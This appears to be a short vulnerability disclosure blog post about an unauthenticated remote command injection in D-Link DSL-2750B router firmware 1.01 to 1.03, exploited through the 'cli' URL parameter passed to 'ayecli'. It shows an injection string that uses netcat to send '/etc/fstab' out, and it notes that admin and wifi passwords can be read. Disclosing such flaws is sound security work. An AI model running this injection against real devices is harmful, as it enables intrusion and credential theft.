• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • D-Link router DSL-2750B firmware 1.01 to 1.03 – RCE no auth


    After playing around a bit with my home router, I’ve noticed something interesting during login phase; user is redirected on error page by providing wrong credentials and the URL catch my eye:$


    In order to see what’s happening, web server must be started on the router with the debug output enabled:


    Seems like arguments of “cli” parameter are the input of a binary that will execute that particular given command; the complete list of commands available are listed inside “/etc/ayecli/ayecli.cli” file on the router. (among them there’s a creepy “system halt” that will shutdown the router no matter what).

    Arguments are used in this way:

    ayecli -c ‘command-here’ 

    To execute remote arbitrary commands we must append ‘ , adding the command and another ‘ , in order to neutralize the substitution that is made with “$” with ‘ at the very end of the URL:

    ayecli -c ‘command’;injection”

    that is: wpassphrase_2.4G’;nc 666 </etc/fstab’$


    By exploiting this bug, is it possible to retrieve also cleartext admin password, wifi passphrase and so on.